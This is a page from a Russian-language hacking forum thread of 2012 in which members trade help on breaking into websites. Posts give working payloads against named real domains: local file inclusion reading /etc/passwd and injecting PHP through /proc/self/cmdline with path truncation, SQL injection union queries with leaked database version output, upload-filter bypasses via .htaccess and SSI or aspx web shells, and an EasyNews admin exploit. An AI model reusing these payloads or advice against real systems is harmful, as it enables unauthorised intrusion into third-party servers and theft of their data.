Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    а через что тогда?
    просто через burp site пробовал не получилось,в нём знак & и после него остальное определяет как новую переменную
    Expl0ited поделись пожалуйста через что ты сделал?
     
  2. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Думаю curl "запрос" вполне удобная штуковина.
     
  3. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    через curl такаяже ситуация.
    как ещё можно?
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ а тут, нужно отсеять окончание, нул байт не помогает
    http://proeveryday.ru/index.php?id=../etc/passwd%00
    тут читал https://forum.antichat.ru/thread98525.html но нифига неполучилось, мб недопонял
    подскажите как правильно
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    запрос такой
    Code:
    curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline&<?php print php_uname();?>/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
    Code:
    curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././&<?php print php_uname();?>
     
    #19825 Faaax, 17 Mar 2012
    Last edited: 17 Mar 2012
    1 person likes this.
  6. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    + OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
    + OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.

    Подскажите как мне использовать эту уязвимость ?
    Просто ввести site.ru/admin.php?en_log_id=0&action=config: ничего не делает :(

    И что за ссылка типа с каким-то скриптом или программой ? http://www.webrc.ca
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    при заливке php, вылезает 500 ошибка, php[2-5] показываются как текст, а phtml скачивается
    есть какие-нибудь варианты что можно сделать?
     
    _________________________
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    .htaccess
     
    _________________________
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    переименовывает файлы, только расширение оставляет
     
    _________________________
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    блин, чёт так не выходит в первом варианте, окончание не обрезается
    во втром ничего не происходт
     
  11. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    заливай SSI шелл. не раз спасал уже.
     
    2 people like this.
  12. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    вот вот,сам ломаю голову
     
  13. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Из эксплойта там строчка http://[target]/[path]/admin.php?action=users&en_login_id=0

    перейдя по которой я ничего сделать не могую
    Также описывается что можно редактировать config2.php или любую другую страничку но и этого не могу :(
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    OxoTnik, нет, все так же 500
    Boolean, SSI doesn't work:(
     
    _________________________
  15. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.surbor.su/enicinfo.php?id=22+order+by+100+--+
    не думается...
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    shadowrun,
    Code:
    http://www.surbor.su/enicinfo.php?id=22/**/Order/**/by/**/11--+d  true
    
    Делаем запрос:
    Code:
    http://www.surbor.su/enicinfo.php?id=-1+union+all+select+null,@@version,null,null,null,null,null,null,null,null,null,null--
    Code:
        <meta name="description" content="понятие [COLOR=Green]Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) 	May 3 2005 23:18:38 	Copyright (c) 1988-2003 Microsoft Corporation	Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)[/COLOR]">

    Soulk3r,
    посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
     
    #19836 Ereee, 18 Mar 2012
    Last edited: 18 Mar 2012
    1 person likes this.
  17. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.studyguide.ru/schools.php?id=817%27+uni/**/On+Sel/**/Ect+1+--+
    хз :cool:
     
  18. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ereee,
    Если не выходит найти phpinfo(); и Эксплойт не пашет значит Rg=off ? и тогда эту багу нельзя юзать ?
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
     
  20. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Вот он
     
Thread Status:
Not open for further replies.